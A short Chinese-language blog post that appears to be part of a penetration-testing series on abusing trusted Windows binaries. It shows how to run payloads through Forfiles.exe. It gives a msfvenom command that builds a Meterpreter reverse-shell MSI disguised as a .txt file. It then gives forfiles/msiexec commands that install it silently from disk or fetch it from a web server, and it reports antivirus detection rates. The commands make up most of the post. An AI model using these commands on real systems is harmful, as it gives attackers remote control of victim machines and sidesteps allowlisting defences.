當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
目錄
0x01 Forfiles.exe介紹
Forfiles是一款windows平臺默認安裝的文件操作搜索工具之一,可以通過文件名稱,修改日期等條件選擇文件並運行一個命令來操作文件。它可以直接在命令行中使用,也可以在批處理文件或其他腳本中使用。
微軟官方文檔:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11
默認安裝位置:
C:\WINDOWS\system32\forfiles.exe
C:\WINDOWS\SysWOW64\forfiles.exe
說明:Forfiles.exe所在路徑已被系統添加PATH環境變量中,因此,Forfiles命令可識別,需注意x86,x64位的Forfiles調用。
0x02 利用Forfiles.exe執行payload
使用msfvenom生成msi文件,指定後綴爲txt。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.100.207 LPORT=4444 -f msi > TIDE.txt
移動到靶機上執行命令運行
forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i C:\Users\administrator\Desktop\TIDE.txt"
成功上線。
還可以通過遠程訪問的形式執行,同樣可以成功上線。
forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe / q /i http://127.0.0.1/TIDE.txt"
打開殺軟進行測試。360殺毒,360安全衛士,和火絨都報毒。
vt查殺率34/60
參考鏈接:
https://micro8.github.io/Micro8-HTML/Chapter1/81-90/84_基於白名單Forfiles執行payload第十四季.html
雖然我們生活在陰溝裏,但依然有人仰望星空!